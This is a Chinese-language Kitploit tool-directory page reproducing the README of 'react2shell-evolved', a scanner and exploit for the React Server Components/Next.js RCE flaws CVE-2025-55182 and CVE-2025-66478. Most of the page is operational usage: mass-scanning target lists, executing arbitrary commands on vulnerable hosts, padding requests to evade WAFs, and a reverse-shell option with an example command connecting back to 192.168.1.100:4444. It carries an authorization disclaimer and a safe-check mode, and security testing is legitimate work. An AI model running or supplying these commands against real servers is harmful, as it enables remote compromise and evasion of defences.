Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
react2shell-evolved — assetnote CVE-2025-55182 扫描器的一个演进版本 | Kitploit
工具/GitHubGitHub/guiimoraes/react2shell-evolved
漏洞扫描器Payload生成漏洞利用Web应用程序漏洞利用WAF绕过渗透测试红队远程访问工具
GitHubguiimoraes/react2shell-evolved

react2shell-evolved

assetnote CVE-2025-55182 扫描器的一个演进版本

查看仓库
21119个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

React2Shell Scanner

用于RSC/Next.js RCE的高保真检测

用于检测React Server Components和Next.js应用程序中远程代码执行(RCE)漏洞的扫描器。

关于

React2Shell Scanner 是一款专用工具,用于识别使用 React Server Components (RSC) 和 Next.js 的应用程序中的远程代码执行(RCE)漏洞。该工具可检测与以下 CVE 相关的漏洞:

  • CVE-2025-55182
  • CVE-2025-66478

该工具利用侧信道检测和 RCE 概念验证进行高保真检测,能够通过自动解析 HTTP 响应来提取已执行命令的动态结果。

此为 @imguimoraes 对 Assetnote Security Research Team 开发的原始扫描器进行编辑的版本。原始 RCE 概念验证由 @maple3142 创建。

特点

  • 使用侧信道和 RCE 概念验证进行高保真检测
  • 多线程扫描以支持批量扫描
  • 动态提取已执行命令的结果(自动解析响应头和响应体)
  • 可配置随机数据的 WAF 绕过
  • 支持 Windows (PowerShell) 和 Linux/Unix (shell)
  • 输出结构化的 JSON 格式以便后续分析
  • 自动跟随重定向
  • 带有进度条和彩色输出的界面

安装

前提条件

  • Python 3.8 或更高版本
  • pip (Python 包管理器)

安装依赖

pip install requests tqdm

或使用 requirements.txt 文件:

pip install -r requirements.txt

使用

基本语法

python scanner.py [-u URL | -l FILE] [选项]

检测单个 URL

python scanner.py -u https://example.com

检测多个 URL

python scanner.py -l hosts.txt

命令行选项

输入选项(必须指定其中之一)

选项描述
-u, --url URL要检测的单个 URL 或主机
-l, --list FILE包含主机列表的文件(每行一个)

执行选项

选项描述
-t, --threads N并发线程数(默认:10)
--timeout SECONDS请求超时秒数(默认:10)
-k, --insecure禁用 SSL 证书验证(默认启用)

输出选项

选项描述
-o, --output FILE输出结果为 JSON 格式的文件
--all-results保存所有结果到文件,而不仅仅是有漏洞的
-v, --verbose详细输出(显示响应片段以供分析)
-q, --quiet静默模式(仅显示有漏洞的主机)
--no-color禁用彩色输出

头部选项

选项描述
-H, --header "Key: Value"添加自定义 HTTP 头(可多次使用)

漏洞利用选项

选项描述
--safe-check使用安全的侧信道检测而非 RCE 概念验证(不执行代码)
--windows使用 PowerShell 载荷而非 Unix shell(适用于 Windows 环境)
--waf-bypass向载荷添加随机数据以绕过 WAF(默认:128KB)
--waf-bypass-size KB用于 WAF 绕过的随机数据大小(KB)(默认:128)
--payload COMMAND在 RCE 中执行的自定义命令(默认:echo $((41*271)))
--reverse-shell IP:PORT创建连接到指定 IP:PORT 的反向 shell

使用示例

示例 1:基本主机扫描

python scanner.py -u https://target.com

示例 2:多线程批量扫描

python scanner.py -l targets.txt -t 50 --timeout 15

示例 3:输出 JSON 结果

python scanner.py -l targets.txt -o results.json --all-results

示例 4:使用自定义头部的扫描

python scanner.py -u https://target.com -H "Authorization: Bearer token" -H "User-Agent: CustomAgent"

示例 5:使用自定义载荷的扫描

python scanner.py -u https://target.com --payload "whoami"

示例 6:WAF 绕过扫描

python scanner.py -l targets.txt --waf-bypass --waf-bypass-size 256

示例 7:Windows 环境扫描

python scanner.py -u https://target.com --windows --payload "whoami"

示例 8:安全检测扫描(非侵入式)

python scanner.py -l targets.txt --safe-check

示例 9:完整详细扫描

python scanner.py -l targets.txt -v --all-results -o full_scan.json

示例 10:建立反向 shell

python scanner.py -u https://target.com --reverse-shell 192.168.1.100:4444

输出格式

终端输出

扫描器使用颜色代码显示结果状态:

  • [VULNERABLE] - 有漏洞的主机(红色)
  • [NOT VULNERABLE] - 无漏洞的主机(绿色)
  • [ERROR] - 检测过程中出错(黄色)

对于有漏洞的主机,当可用时,会通过自动提取 X-Action-Redirect 头或响应体显示已执行命令的结果。

JSON 格式

当使用 -o 选项时,输出将保存为 JSON 格式,结构如下:

{
  "scan_time": "2025-01-XXT00:00:00.000000Z",
  "total_results": 10,
  "results": [
    {
      "host": "https://target.com",
      "vulnerable": true,
      "status_code": 307,
      "final_url": "https://target.com/",
      "command_result": "11111",
      "timestamp": "2025-01-XXT00:00:00.000000Z",
      "request": "POST / HTTP/1.1\r\n...",
      "response": "HTTP/1.1 307 Temporary Redirect\r\n...",
      "error": null
    }
  ]
}

结果字段说明:

  • vulnerable: true 表示有漏洞,false 表示无漏洞,null 表示发生错误
  • command_result: 从响应中提取的已执行命令的结果(可用时)
  • final_url: 最终测试的 URL(如果启用了重定向跟随)
  • status_code: 响应的 HTTP 状态码
  • request: 发送的完整 HTTP 请求
  • response: 接收到的 HTTP 响应(前 2000 个字符)
  • error: 错误信息(如果有)
  • timestamp: 检测的 UTC 时间戳

技术功能

检测方法

扫描器提供两种检测方法:

  1. 安全检测 (--safe-check): 非侵入式侧信道检测,在不执行代码的情况下检查响应中的错误模式。适用于无影响的初始扫描。

  2. RCE 概念验证: 实际执行远程代码,动态提取结果。利用基于 Node.js child_process 的载荷来执行系统命令。

结果提取

扫描器自动解析 HTTP 响应以提取已执行命令的结果:

  • 从 X-Action-Redirect 头中提取(格式:NEXT_REDIRECT;push;/login?a=<result>;307;)
  • 从响应体中提取(格式:E{"digest":"<result>"} 或 1:E{"digest":"<result>"})
  • 通过 --payload 参数支持任何自定义命令/载荷

提取过程是动态的,不依赖于固定值,从而可以验证任何命令的执行。

WAF 绕过

当使用 --waf-bypass 选项时:

  • 在 multipart/form-data 载荷的开头添加随机数据(垃圾数据)
  • 可通过 --waf-bypass-size 配置大小(默认:128KB)
  • 用于绕过检查请求体内容的 WAF 过滤器
  • 当 WAF 绕过激活时,超时时间自动增加到 20 秒

自定义载荷

--payload 参数允许指定要执行的任何命令:

  • 默认:echo $((41*271))(结果:11111)
  • Windows:当 --windows 激活时,使用 PowerShell 命令
  • Linux/Unix:使用标准 shell 命令

命令结果会自动提取并显示,与返回值无关。

反向 Shell

--reverse-shell 选项允许建立反向 shell 连接:

  • 格式:IP:PORT(例如:192.168.1.100:4444)
  • 利用 Node.js net 和 child_process 模块
  • 对于 Windows:生成 powershell.exe
  • 对于 Linux/Unix:生成 /bin/sh

法律与道德声明

本工具仅用于教育目的和授权安全测试。

  • 仅在你拥有或获得明确书面许可的系统上使用
  • 未经授权使用此工具是违法的,可能导致刑事追究
  • 开发者不对本工具的任何滥用承担责任
  • 在执行渗透测试之前,务必获得书面授权
  • 遵守您所在辖区的适用法律法规

致谢

原始漏洞利用

原始 RCE 漏洞利用由 @maple3142 创建。

原始扫描器

原始扫描器由 Assetnote Security Research Team 开发:

  • 仓库:https://github.com/assetnote/react2shell-scanner/
  • 网站:https://www.assetnote.io/

本版本

本编辑版本保留了原始扫描器的功能,并增加了以下改进:

  • 动态提取命令结果(自动解析响应)
  • 支持自定义命令并提取结果
  • 移除 Vercel Bypass(已于 ??/??/2025 修补)
  • 反向 Shell 系统(崩溃友好型)

编辑者:guiimoraes

相关 CVE

  • CVE-2025-55182
  • CVE-2025-66478

如果您发现错误或有改进建议,请在仓库中提交 issue,详细描述问题。

下载工具